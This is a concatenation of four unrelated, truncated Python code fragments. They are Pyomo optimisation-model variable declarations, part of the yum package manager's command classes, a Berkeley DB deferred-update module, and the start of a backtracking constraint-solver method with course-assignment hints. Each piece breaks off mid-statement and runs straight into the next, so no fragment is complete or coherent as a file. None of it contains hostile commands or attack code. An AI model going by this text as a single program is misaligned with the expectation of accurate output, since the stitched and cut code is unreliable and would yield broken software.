m.x3695 = Var(within=Reals,bounds=(0,None),initialize=1.1829307)
m.x3696 = Var(within=Reals,bounds=(0,None),initialize=0.02653)
m.x3697 = Var(within=Reals,bounds=(0,None),initialize=0.856571)
m.x3698 = Var(within=Reals,bounds=(0,None),initialize=0.00187207427945528)
m.x3699 = Var(within=Reals,bounds=(0,None),initialize=0.0202129527358336)
m.x3700 = Var(within=Reals,bounds=(0,None),initialize=0.0442343871470679)
m.x3701 = Var(within=Reals,bounds=(0,None),initialize=0.0574360722383835)
m.x3702 = Var(within=Reals,bounds=(0,None),initialize=0.00335943751699444)
m.x3703 = Var(within=Reals,bounds=(0,None),initialize=0.0414684649939445)
m.x3704 = Var(within=Reals,bounds=(0,None),initialize=0.00142370683016)
m.x3705 = Var(within=Reals,bounds=(0,None),initialize=0.0261048144406948)
m.x3706 = Var(within=Reals,bounds=(0,None),initialize=0.0192415620599879)
m.x3707 = Var(within=Reals,bounds=(0,None),initialize=0.0308271412717929)
m.x3708 = Var(within=Reals,bounds=(0,None),initialize=0.0544368905417636)
m.x3709 = Var(within=Reals,bounds=(0,None),initialize=0.133426281036571)
m.x3710 = Var(within=Reals,bounds=(0,None),initialize=11.8663862498047)
m.x3711 = Var(within=Reals,bounds=(0,None),initialize=12.2468430395096)
m.x3712 = Var(within=Reals,bounds=(0,None),initialize=1.18265198586128)
m.x3713 = Var(within=Reals,bounds=(0,None),initialize=1.81320274750686)
m.x3714 = Var(within=Reals,bounds=(0,None),initialize=1.17534474475467)
m.x3715 = Var(within=Reals,bounds=(0,None),initialize=3.79088717538741)
m.x3716 = Var(within=Reals,bounds=(0,None),initialize=7.4119182481687)
m.x3717 = Var(within=Reals,bounds=(0,None),initialize=0.660421718039389)
m.x3718 = Var(within=Reals,bounds=(0,None),initialize=0.214203762120338)
m.x3719 = Var(within=Reals,bounds=(0,None),initialize=4.02694371008304)
m.x3720 = Var(within=Reals,bounds=(0,None),initialize=0.775923055804487)
m.x3721 = Var(within=Reals,bounds=(0,None),initialize=0.0697626978284835)
m.x3722 = Var(within=Reals,bounds=(0,None),initialize=0.784207158779134)
m.x3723 = Var(within=Reals,bounds=(0,None),initialize=0.0925713882608052)
m.x3724 = Var(within=Reals,bounds=(0,None),initialize=0.55725348179004)
m.x3725 = Var(within=Reals,bounds=(0,None),initialize=0.632238551343254)
m.x3726 = Var(within=Reals,bounds=(0,None),initialize=0.255637722149483)
m.x3727 = Var(within=Reals,bounds=(0,None),initialize=2.07468645538596)
m.x3728 = Var(within=Reals,bounds=(0,None),initialize=0.578394481938526)
m.x3729 = Var(within=Reals,bounds=(0,None),initialize=0.110757138512429)
m.x3730 = Var(within=Reals,bounds=(0,None),initialize=0.196380776989263)
m.x3731 = Var(within=Reals,bounds=(0,None),initialize=1.33036257037804)
m.x3732 = Var(within=Reals,bounds=(0,None),initialize=0.155364326448861)
m.x3733 = Var(within=Reals,bounds=(0,None),initialize=0.0228977615372253)
m.x3734 = Var(within=Reals,bounds=(0,None),initialize=0.00610861621970931)
m.x3735 = Var(within=Reals,bounds=(0,None),initialize=0.892900168544807)
m.x3736 = Var(within=Reals,bounds=(0,None),initialize=0.217530636142636)
m.x3737 = Var(within=Reals,bounds=(0,None),initialize=0.0938119046256907)
m.x3738 = Var(within=Reals,bounds=(0,None),initialize=0.179905056538954)
m.x3739 = Var(within=Reals,bounds=(0,None),initialize=3.11552062431325)
m.x3740 = Var(within=Reals,bounds=(0,None),initialize=1.11846461956999)
m.x3741 = Var(within=Reals,bounds=(0,None),initialize=3.0510412382191)
m.x3742 = Var(within=Reals,bounds=(0,None),initialize=0.260371994459074)
m.x3743 = Var(within=Reals,bounds=(0,None),initialize=34.2638978138185)
m.x3744 = Var(within=Reals,bounds=(0,None),initialize=27.7327935181579)
m.x3745 = Var(within=Reals,bounds=(0,None),initialize=0.028131538031253)
m.x3746 = Var(within=Reals,bounds=(0,None),initialize=0.140657690156265)
m.x3747 = Var(within=Reals,bounds=(0,None),initialize=0.599295087443045)
m.x3748 = Var(within=Reals,bounds=(0,None),initialize=0.148995001548)
m.x3749 = Var(within=Reals,bounds=(0,None),initialize=7.91750738922413)
m.x3750 = Var(within=Reals,bounds=(0,None),initialize=1.18094992040429)
m.x3751 = Var(within=Reals,bounds=(0,None),initialize=0.698140175588923)
m.x3752 = Var(within=Reals,bounds=(0,None),initialize=6.60638444841137)
m.x3753 = Var(within=Reals,bounds=(0,None),initialize=6.81819651704683)
m.x3754 = Var(within=Reals,bounds=(0,None),initialize=0.658418959470949)
m.x3755 = Var(within=Reals,bounds=(0,None),initialize=1.00946608181941)
m.x3756 = Var(within=Reals,bounds=(0,None),initialize=0.654350792213349)
m.x3757 = Var(within=Reals,bounds=(0,None),initialize=2.1105042052355)
m.x3758 = Var(within=Reals,bounds=(0,None),initialize=4.12644426169796)
m.x3759 = Var(within=Reals,bounds=(0,None),initialize=0.367677208174506)
m.x3760 = Var(within=Reals,bounds=(0,None),initialize=0.286052300758072)
m.x3761 = Var(within=Reals,bounds=(0,None),initialize=2.61214851487786)
m.x3762 = Var(within=Reals,bounds=(0,None),initialize=0.655427629694048)
m.x3763 = Var(within=Reals,bounds=(0,None),initialize=0.0589290385647548)
m.x3764 = Var(within=Reals,bounds=(0,None),initialize=0.66242526939066)
m.x3765 = Var(within=Reals,bounds=(0,None),initialize=0.122162061748241)
m.x3766 = Var(within=Reals,bounds=(0,None),initialize=0.735380937142974)
m.x3767 = Var(within=Reals,bounds=(0,None),initialize=0.834335169860628)
m.x3768 = Var(within=Reals,bounds=(0,None),initialize=0.33735295305739)
m.x3769 = Var(within=Reals,bounds=(0,None),initialize=2.73786511829172)
m.x3770 = Var(within=Reals,bounds=(0,None),initialize=0.763279710339319)
m.x3771 = Var(within=Reals,bounds=(0,None),initialize=0.146160932100254)
m.x3772 = Var(within=Reals,bounds=(0,None),initialize=0.165884215215253)
m.x3773 = Var(within=Reals,bounds=(0,None),initialize=1.30227270682686)
m.x3774 = Var(within=Reals,bounds=(0,None),initialize=0.967942895643967)
m.x3775 = Var(within=Reals,bounds=(0,None),initialize=0.142656465050245)
m.x3776 = Var(within=Reals,bounds=(0,None),initialize=0.00536931864111687)
m.x3777 = Var(within=Reals,bounds=(0,None),initialize=0.54909596020259)
m.x3778 = Var(within=Reals,bounds=(0,None),initialize=1.00535165651302)
m.x3779 = Var(within=Reals,bounds=(0,None),initialize=0.433566303066558)
m.x3780 = Var(within=Reals,bounds=(0,None),initialize=0.576614213532147)
m.x3781 = Var(within=Reals,bounds=(0,None),initialize=3.03082489176049)
m.x3782 = Var(within=Reals,bounds=(0,None),initialize=1.08805904961499)
m.x3783 = Var(within=Reals,bounds=(0,None),initialize=1.24981560888688)
m.x3784 = Var(within=Reals,bounds=(0,None),initialize=0.661616925046571)
m.x3785 = Var(within=Reals,bounds=(0,None),initialize=42.3401261404924)
m.x3786 = Var(within=Reals,bounds=(0,None),initialize=14.8981191213562)
m.x3787 = Var(within=Reals,bounds=(0,None),initialize=0.150584795947117)
m.x3788 = Var(within=Reals,bounds=(0,None),initialize=0.752923979735586)
m.x3789 = Var(within=Reals,bounds=(0,None),initialize=1.5898262669498)
m.x3790 = Var(within=Reals,bounds=(0,None),initialize=0.612233805726)
m.x3791 = Var(within=Reals,bounds=(0,None),initialize=9.66185688010391)
m.x3792 = Var(within=Reals,bounds=(0,None),initialize=1.65968957951209)
m.x3793 = Var(within=Reals,bounds=(0,None),initialize=0.590523080858794)
m.x3794 = Var(within=Reals,bounds=(0,None),initialize=4.14473091043187)
m.x3795 = Var(within=Reals,bounds=(0,None),initialize=4.27761812505455)
m.x3796 | |
"special" param like "updates"
# in returnPkgLists(). This allows us to always return "ok" for
# things like "yum list updates".
if len(extcmds) and \
rrap[0] and rop[0] and rup[0] and rep[0] and rap[0] and rip[0]:
return 1, [_('No matching Packages to list')]
return 0, []
def needTs(self, base, basecmd, extcmds):
if len(extcmds) and extcmds[0] == 'installed':
return False
return True
class ListCommand(InfoCommand):
def getNames(self):
return ['list']
def getSummary(self):
return _("List a package or groups of packages")
class EraseCommand(YumCommand):
def getNames(self):
return ['erase', 'remove']
def getUsage(self):
return "PACKAGE..."
def getSummary(self):
return _("Remove a package or packages from your system")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkPackageArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Setting up Remove Process"))
try:
return base.erasePkgs(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
def needTsRemove(self, base, basecmd, extcmds):
return True
class GroupCommand(YumCommand):
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Setting up Group Process"))
base.doRepoSetup(dosack=0)
try:
base.doGroupSetup()
except yum.Errors.GroupsError:
return 1, [_('No Groups on which to run command')]
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class GroupListCommand(GroupCommand):
def getNames(self):
return ['grouplist']
def getUsage(self):
return ""
def getSummary(self):
return _("List available package groups")
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
return base.returnGroupLists(extcmds)
def needTs(self, base, basecmd, extcmds):
return False
class GroupInstallCommand(GroupCommand):
def getNames(self):
return ['groupinstall', 'groupupdate']
def getUsage(self):
return "GROUP..."
def getSummary(self):
return _("Install the packages in a group on your system")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGPGKey(base)
checkGroupArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
try:
return base.installGroups(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class GroupRemoveCommand(GroupCommand):
def getNames(self):
return ['groupremove', 'grouperase']
def getUsage(self):
return "GROUP..."
def getSummary(self):
return _("Remove the packages in a group from your system")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGroupArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
try:
return base.removeGroups(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
def needTsRemove(self, base, basecmd, extcmds):
return True
class GroupInfoCommand(GroupCommand):
def getNames(self):
return ['groupinfo']
def getUsage(self):
return "GROUP..."
def getSummary(self):
return _("Display details about a package group")
def doCheck(self, base, basecmd, extcmds):
checkGroupArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
GroupCommand.doCommand(self, base, basecmd, extcmds)
try:
return base.returnGroupInfo(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class MakeCacheCommand(YumCommand):
def getNames(self):
return ['makecache']
def getUsage(self):
return ""
def getSummary(self):
return _("Generate the metadata cache")
def doCheck(self, base, basecmd, extcmds):
pass
def doCommand(self, base, basecmd, extcmds):
base.logger.debug(_("Making cache files for all metadata files."))
base.logger.debug(_("This may take a while depending on the speed of this computer"))
try:
for repo in base.repos.findRepos('*'):
repo.metadata_expire = 0
repo.mdpolicy = "group:all"
base.doRepoSetup(dosack=0)
base.repos.doSetup()
for repo in base.repos.listEnabled():
repo.repoXML
# These convert the downloaded data into usable data,
# we can't remove them until *LoadRepo() can do:
# 1. Download a .sqlite.bz2 and convert to .sqlite
# 2. Download a .xml.gz and convert to .xml.gz.sqlite
base.repos.populateSack(mdtype='metadata', cacheonly=1)
base.repos.populateSack(mdtype='filelists', cacheonly=1)
base.repos.populateSack(mdtype='otherdata', cacheonly=1)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
return 0, [_('Metadata Cache Created')]
def needTs(self, base, basecmd, extcmds):
return False
class CleanCommand(YumCommand):
def getNames(self):
return ['clean']
def getUsage(self):
return "[headers|packages|metadata|dbcache|plugins|expire-cache|all]"
def getSummary(self):
return _("Remove cached data")
def doCheck(self, base, basecmd, extcmds):
checkCleanArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
base.conf.cache = 1
return base.cleanCli(extcmds)
def needTs(self, base, basecmd, extcmds):
return False
class ProvidesCommand(YumCommand):
def getNames(self):
return ['provides', 'whatprovides']
def getUsage(self):
return "SOME_STRING"
def getSummary(self):
return _("Find what package provides the given value")
def doCheck(self, base, basecmd, extcmds):
checkItemArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
base.logger.debug("Searching Packages: ")
try:
return base.provides(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class CheckUpdateCommand(YumCommand):
def getNames(self):
return ['check-update']
def getUsage(self):
return "[PACKAGE...]"
def getSummary(self):
return _("Check for available package updates")
def doCommand(self, base, basecmd, extcmds):
base.extcmds.insert(0, 'updates')
result = 0
try:
ypl = base.returnPkgLists(extcmds)
if (base.conf.obsoletes or
base.verbose_logger.isEnabledFor(logginglevels.DEBUG_3)):
typl = base.returnPkgLists(['obsoletes'])
ypl.obsoletes = typl.obsoletes
ypl.obsoletesTuples = typl.obsoletesTuples
columns = _list_cmd_calc_columns(base, ypl)
if len(ypl.updates) > 0:
local_pkgs = {}
highlight = base.term.MODE['bold']
if highlight:
# Do the local/remote split we get in "yum updates"
for po in sorted(ypl.updates):
if po.repo.id != 'installed' and po.verifyLocalPkg():
local_pkgs[(po.name, po.arch)] = po
cul = base.conf.color_update_local
cur = base.conf.color_update_remote
base.listPkgs(ypl.updates, '', outputType='list',
highlight_na=local_pkgs, columns=columns,
highlight_modes={'=' : cul, 'not in' : cur})
result = 100
if len(ypl.obsoletes) > 0: # This only happens in verbose mode
print _('Obsoleting Packages')
# The tuple is (newPkg, oldPkg) ... so sort by new
for obtup in sorted(ypl.obsoletesTuples,
key=operator.itemgetter(0)):
base.updatesObsoletesList(obtup, 'obsoletes',
columns=columns)
result = 100
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
else:
return result, []
class SearchCommand(YumCommand):
def getNames(self):
return ['search']
def getUsage(self):
return "SOME_STRING"
def getSummary(self):
return _("Search package details for the given string")
def doCheck(self, base, basecmd, extcmds):
checkItemArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
base.logger.debug(_("Searching Packages: "))
try:
return base.search(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class UpgradeCommand(YumCommand):
def getNames(self):
return ['upgrade']
def getUsage(self):
return 'PACKAGE...'
def getSummary(self):
return _("Update packages taking obsoletes into account")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGPGKey(base)
def doCommand(self, base, basecmd, extcmds):
base.conf.obsoletes = 1
self.doneCommand(base, _("Setting up Upgrade Process"))
try:
return base.updatePkgs(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class LocalInstallCommand(YumCommand):
def getNames(self):
return ['localinstall', 'localupdate']
def getUsage(self):
return "FILE"
def getSummary(self):
return _("Install a local RPM")
def doCheck(self, base, basecmd, extcmds):
checkRootUID(base)
checkGPGKey(base)
checkPackageArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Setting up Local Package Process"))
updateonly = basecmd == 'localupdate'
try:
return base.localInstall(filelist=extcmds, updateonly=updateonly)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class ResolveDepCommand(YumCommand):
def getNames(self):
return ['resolvedep']
def getUsage(self):
return "DEPENDENCY"
def getSummary(self):
return _("Determine which package provides the given dependency")
def doCommand(self, base, basecmd, extcmds):
base.logger.debug(_("Searching Packages for Dependency:"))
try:
return base.resolveDepCli(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class ShellCommand(YumCommand):
def getNames(self):
return ['shell']
def getUsage(self):
return "[FILENAME]"
def getSummary(self):
return _("Run an interactive yum shell")
def doCheck(self, base, basecmd, extcmds):
checkShellArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _('Setting up Yum Shell'))
try:
return base.doShell()
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
def needTs(self, base, basecmd, extcmds):
return False
class DepListCommand(YumCommand):
def getNames(self):
return ['deplist']
def getUsage(self):
return 'PACKAGE...'
def getSummary(self):
return _("List a package's dependencies")
def doCheck(self, base, basecmd, extcmds):
checkPackageArg(base, basecmd, extcmds)
def doCommand(self, base, basecmd, extcmds):
self.doneCommand(base, _("Finding dependencies: "))
try:
return base.deplist(extcmds)
except yum.Errors.YumBaseError, e:
return 1, [str(e)]
class RepoListCommand(YumCommand):
def getNames(self):
return ('repolist',)
def getUsage(self):
return '[all|enabled|disabled]'
def getSummary(self):
return _('Display the configured software repositories')
def doCommand(self, base, basecmd, extcmds):
def _repo_size(repo):
ret = 0
for pkg in repo.sack.returnPackages():
ret += pkg.packagesize
return base.format_number(ret)
def _repo_match(repo, patterns):
rid = repo.id.lower()
rnm = repo.name.lower()
for pat in patterns:
if fnmatch.fnmatch(rid, pat):
return True
if fnmatch.fnmatch(rnm, pat):
return True
return False
def _num2ui_num(num):
return to_unicode(locale.format("%d", num, True))
if len(extcmds) >= 1 and extcmds[0] in ('all', 'disabled', 'enabled'):
arg = extcmds[0]
extcmds = extcmds[1:]
else:
arg = 'enabled'
extcmds = map(lambda x: x.lower(), extcmds)
verbose = base.verbose_logger.isEnabledFor(logginglevels.DEBUG_3)
if arg != 'disabled' or extcmds:
try:
# Setup so len(repo.sack) is correct
base.repos.populateSack()
base.pkgSack # Need to setup the pkgSack, so excludes work
except yum.Errors.RepoError:
if verbose:
raise
repos = base.repos.repos.values()
repos.sort()
enabled_repos = base.repos.listEnabled()
on_ehibeg = base.term.FG_COLOR['green'] + base.term.MODE['bold']
on_dhibeg = base.term.FG_COLOR['red']
on_hiend = base.term.MODE['normal']
tot_num = 0
cols = []
for repo in repos:
if len(extcmds) and not _repo_match(repo, extcmds):
continue
(ehibeg, dhibeg, hiend) = '', '', ''
ui_enabled = ''
ui_endis_wid = 0
ui_num = ""
ui_excludes_num = ''
force_show = False
if arg == 'all' or repo.id in extcmds or repo.name in extcmds:
force_show = True
(ehibeg, dhibeg, hiend) = (on_ehibeg, on_dhibeg, on_hiend)
if repo in enabled_repos:
enabled = True
if arg == 'enabled':
force_show = False
elif arg == 'disabled' and not force_show:
continue
if force_show or verbose:
ui_enabled = ehibeg + _('enabled') + hiend
ui_endis_wid = utf8_width(_('enabled'))
if not verbose:
ui_enabled += ": "
ui_endis_wid += 2
if verbose:
ui_size = | |
<gh_stars>0
# dbdu.py
# Copyright (c) 2019 <NAME>
# Licence: See LICENCE (BSD licence)
"""Access a Berkeley DB database with the bsddb3 module."""
import heapq
import collections
from .bytebit import Bitarray
from .constants import (
SECONDARY,
# ACCESS_METHOD,
# HASH,
SUBFILE_DELIMITER,
SEGMENT_HEADER_LENGTH,
)
from .segmentsize import SegmentSize
from .recordset import (
RecordsetSegmentBitarray,
RecordsetSegmentInt,
RecordsetSegmentList,
)
from . import _databasedu
class DatabaseError(Exception):
"""Exception for Database class."""
class Database(_databasedu.Database):
"""Customise _db.Database for deferred update.
The class which chooses the interface to Berkeley DB must include this
class earlier in the Method Resolution Order than _db.Database.
Normally deferred updates are synchronised with adding the last record
number to a segment. Sometimes memory constraints will force deferred
updates to be done more frequently, but this will likely increase the time
taken to do the deferred updates for the second and later points in a
segment.
"""
def __init__(self, *a, **kw):
"""Extend and initialize deferred update data structures."""
super().__init__(*a, **kw)
self.deferred_update_points = None
self.first_chunk = {}
self.high_segment = {}
self.initial_high_segment = {}
self.existence_bit_maps = {}
self.value_segments = {} # was values in secondarydu.Secondary
self._int_to_bytes = None
def database_cursor(self, file, field, keyrange=None):
"""Not implemented for deferred update."""
raise DatabaseError("database_cursor not implemented")
# Deferred updates are non-transactional in Berkeley DB.
def environment_flags(self, dbe):
"""Return environment flags for deferred update."""
return (
dbe.DB_CREATE
|
# dbe.DB_RECOVER |
dbe.DB_INIT_MPOOL
| dbe.DB_INIT_LOCK
|
# dbe.DB_INIT_LOG |
# dbe.DB_INIT_TXN |
dbe.DB_PRIVATE
)
def checkpoint_before_close_dbenv(self):
"""Do nothing. Deferred updates are non-transactional."""
# Most calls of txn_checkpoint() are conditional on self.dbtxn, but the
# call when closing the database does not check for a transaction.
# Rely on environment_flags() call for transaction state.
def start_transaction(self):
"""Do not start transaction in deferred update mode."""
self.dbtxn = None
def do_final_segment_deferred_updates(self):
"""Do deferred updates for partially filled final segment."""
# Write the final deferred segment database for each index
for file in self.existence_bit_maps:
dbc = self.table[file][0].cursor(txn=self.dbtxn)
try:
segment, record_number = divmod(
dbc.last()[0], SegmentSize.db_segment_size
)
if record_number in self.deferred_update_points:
continue # Assume put_instance did deferred updates
except TypeError:
continue
finally:
dbc.close()
self.write_existence_bit_map(file, segment)
for secondary in self.specification[file][SECONDARY]:
self.sort_and_write(file, secondary, segment)
self.merge(file, secondary)
def set_defer_update(self):
"""Prepare to do deferred update run."""
self._int_to_bytes = [
n.to_bytes(2, byteorder="big")
for n in range(SegmentSize.db_segment_size)
]
self.start_transaction()
for file in self.specification:
dbc = self.table[file][0].cursor()
try:
high_record = dbc.last()
finally:
dbc.close()
if high_record is None:
self.initial_high_segment[file] = None
self.high_segment[file] = None
self.first_chunk[file] = None
continue
segment, record = divmod(
high_record[0], SegmentSize.db_segment_size
)
self.initial_high_segment[file] = segment
self.high_segment[file] = segment
self.first_chunk[file] = record < min(self.deferred_update_points)
def unset_defer_update(self):
"""Unset deferred update for db DBs. Default all."""
self._int_to_bytes = None
for file in self.specification:
self.high_segment[file] = None
self.first_chunk[file] = None
self.commit()
def write_existence_bit_map(self, file, segment):
"""Write the existence bit map for segment."""
self.ebm_control[file].ebm_table.put(
segment + 1, self.existence_bit_maps[file][segment].tobytes()
)
def _sort_and_write_high_or_chunk(
self, file, field, segment, cursor_new, segvalues
):
# Note cursor_high binds to database (table_connection_list[0]) only if
# it is the only table.
# if self.specification[file][FIELDS].get(ACCESS_METHOD) == HASH:
# segkeys = tuple(segvalues)
# else:
# segkeys = sorted(segvalues)
# Follow example set it merge().
# To verify path coverage uncomment the '_path_marker' code.
# self._path_marker = set()
segkeys = sorted(segvalues)
cursor_high = self.table[SUBFILE_DELIMITER.join((file, field))][
-1
].cursor(txn=self.dbtxn)
try:
for skey in segkeys:
k = skey.encode()
# Get high existing segment for value.
if not cursor_high.set(k):
# No segments for this index value.
# self._path_marker.add('p1')
continue
if not cursor_high.next_nodup():
segref = cursor_high.last()[1]
# self._path_marker.add('p2a')
else:
# self._path_marker.add('p2b')
segref = cursor_high.prev()[1]
if segment != int.from_bytes(segref[:4], byteorder="big"):
# No records exist in high segment for this index
# value.
# self._path_marker.add('p3')
continue
current_segment = self.populate_segment(segref, file)
seg = (
self.make_segment(k, segment, *segvalues[skey])
| current_segment
).normalize()
# Avoid 'RecordsetSegment<*>.count_records()' methods becasue
# the Bitarray version is too slow, and the counts are derived
# from sources available here.
# Safe to add the counts because the new segment will not use
# record numbers already present on current segment.
if isinstance(current_segment, RecordsetSegmentInt):
# self._path_marker.add('p4a')
current_count = 1
else:
# self._path_marker.add('p4b')
current_count = int.from_bytes(
segref[4:SEGMENT_HEADER_LENGTH], "big"
)
new_count = segvalues[skey][0] + current_count
if isinstance(seg, RecordsetSegmentBitarray):
# self._path_marker.add('p5a')
if isinstance(current_segment, RecordsetSegmentList):
# self._path_marker.add('p5a-a')
self.segment_table[file].put(
int.from_bytes(segref[-4:], "big"), seg.tobytes()
)
cursor_high.delete()
cursor_high.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
segref[-4:],
)
),
self._dbe.DB_KEYLAST,
)
elif isinstance(current_segment, RecordsetSegmentInt):
# self._path_marker.add('p5a-b')
srn = self.segment_table[file].append(seg.tobytes())
cursor_new.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
srn.to_bytes(4, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
else:
# self._path_marker.add('p5a-c')
self.segment_table[file].put(
int.from_bytes(segref[-4:], "big"), seg.tobytes()
)
cursor_high.delete()
cursor_high.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
segref[-4:],
)
),
self._dbe.DB_KEYLAST,
)
elif isinstance(seg, RecordsetSegmentList):
# self._path_marker.add('p5b')
if isinstance(current_segment, RecordsetSegmentInt):
# self._path_marker.add('p5b-a')
srn = self.segment_table[file].append(seg.tobytes())
cursor_new.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
srn.to_bytes(4, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
else:
# self._path_marker.add('p5b-b')
self.segment_table[file].put(
int.from_bytes(segref[-4:], "big"), seg.tobytes()
)
cursor_high.delete()
cursor_high.put(
k,
b"".join(
(
segref[:4],
new_count.to_bytes(2, byteorder="big"),
segref[-4:],
)
),
self._dbe.DB_KEYLAST,
)
else:
# self._path_marker.add('p5c')
raise DatabaseError("Unexpected segment type")
# Delete segment so it is not processed again as a new
# segment.
del segvalues[skey]
finally:
# self._path_marker.add('p6')
cursor_high.close()
del cursor_high
del segkeys
def sort_and_write(self, file, field, segment):
"""Sort the segment deferred updates before writing to database."""
# Anything to do?
if field not in self.value_segments[file]:
return
# Lookup table is much quicker, and noticeable, in bulk use.
int_to_bytes = self._int_to_bytes
segvalues = self.value_segments[file][field]
# Prepare to wrap the record numbers in an appropriate Segment class.
for k in segvalues:
value = segvalues[k]
if isinstance(value, list):
segvalues[k] = [
len(value),
b"".join([int_to_bytes[n] for n in value]),
]
elif isinstance(value, Bitarray):
segvalues[k] = [
value.count(),
value.tobytes(),
]
elif isinstance(value, int):
segvalues[k] = [1, value]
# New records go into temporary databases, one for each segment, except
# when filling the segment which was high when this update started.
if (
self.first_chunk[file]
and self.initial_high_segment[file] != segment
):
self.new_deferred_root(file, field)
# The low segment in the import may have to be merged with an existing
# high segment on the database, or the current segment in the import
# may be done in chunks of less than a complete segment. (The code
# which handles this is in self._sort_and_write_high_or_chunk because
# the indentation seems too far right for easy reading: there is an
# extra 'try ... finally ...' compared with the _sqlitedu module which
# makes the difference.)
# Note the substantive difference between this module and _sqlitedu:
# the code for Berkeley DB updates the main index directly if an entry
# already exists, but the code for SQLite always updates a temporary
# table and merges into the main table later.
cursor_new = self.table[SUBFILE_DELIMITER.join((file, field))][
-1
].cursor(txn=self.dbtxn)
try:
if (
self.high_segment[file] == segment
or not self.first_chunk[file]
):
self._sort_and_write_high_or_chunk(
file, field, segment, cursor_new, segvalues
)
# Add the new segments in segvalues
segment_bytes = segment.to_bytes(4, byteorder="big")
# if self.specification[file][FIELDS].get(ACCESS_METHOD) == HASH:
# segkeys = tuple(segvalues)
# else:
# segkeys = sorted(segvalues)
segkeys = sorted(segvalues)
for skey in segkeys:
count, records = segvalues[skey]
del segvalues[skey]
k = skey.encode()
if count > 1:
srn = self.segment_table[file].append(records)
cursor_new.put(
k,
b"".join(
(
segment_bytes,
count.to_bytes(2, byteorder="big"),
srn.to_bytes(4, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
else:
cursor_new.put(
k,
b"".join(
(
segment_bytes,
records.to_bytes(2, byteorder="big"),
)
),
self._dbe.DB_KEYLAST,
)
finally:
cursor_new.close()
# self.table_connection_list[-1].close() # multi-chunk segments
# Flush buffers to avoid 'missing record' exception in populate_segment
# calls in later multi-chunk updates on same segment. Not known to be
# needed generally yet.
self.segment_table[file].sync()
def new_deferred_root(self, file, field):
"""Make new DB in dbenv for deferred updates and close current one."""
tablename = SUBFILE_DELIMITER.join((file, field))
self.table[tablename].append(self._dbe.DB(self.dbenv))
if len(self.table[tablename]) > 2:
try:
self.table[tablename][-2].close()
except:
pass
try:
# am = self.specification[file][FIELDS][field].get(ACCESS_METHOD)
self.table[tablename][-1].set_flags(self._dbe.DB_DUPSORT)
secondary = SUBFILE_DELIMITER.join(
(str(len(self.table[tablename]) - 1), file, field)
)
self.table[tablename][-1].open(
secondary if self.home_directory is not None else None,
secondary,
self._dbe.DB_BTREE,
self._dbe.DB_CREATE,
txn=self.dbtxn,
)
except:
for obj in self.table[tablename][1:]:
try:
obj.close()
except:
pass
self.close()
raise
def merge(self, file, field):
"""Merge the segment deferred updates into database."""
# Merge the segment deferred updates into database.
# Some of the unit testing using commented '_path_marker' code can be
# done with unittest.mock with suitable blocks of code delegated to
| |
numAssigned + 1, weight * deltaWeight)
del assignment[var]
else:
# Arc consistency check is enabled. This is helpful to speed up 3c.
for val in ordered_values:
deltaWeight = self.get_delta_weight(assignment, var, val)
if deltaWeight > 0:
assignment[var] = val
# create a deep copy of domains as we are going to look
# ahead and change domain values
localCopy = copy.deepcopy(self.domains)
# fix value for the selected variable so that hopefully we
# can eliminate values for other variables
self.domains[var] = [val]
# enforce arc consistency
self.apply_arc_consistency(var)
self.backtrack(assignment, numAssigned + 1, weight * deltaWeight)
# restore the previous domains
self.domains = localCopy
del assignment[var]
def get_unassigned_variable(self, assignment: Dict):
"""
Given a partial assignment, return a currently unassigned variable.
@param assignment: A dictionary of current assignment. This is the same as
what you've seen so far.
@return var: a currently unassigned variable. The type of the variable
depends on what was added with csp.add_variable
"""
if not self.mcv:
# Select a variable without any heuristics.
for var in self.csp.variables:
if var not in assignment: return var
else:
# Problem 1b
# Heuristic: most constrained variable (MCV)
# Select a variable with the least number of remaining domain values.
# Hint: given var, self.domains[var] gives you all the possible values.
# Make sure you're finding the domain of the right variable!
# Hint: satisfies_constraints determines whether or not assigning a
# variable to some value given a partial assignment continues
# to satisfy all constraints.
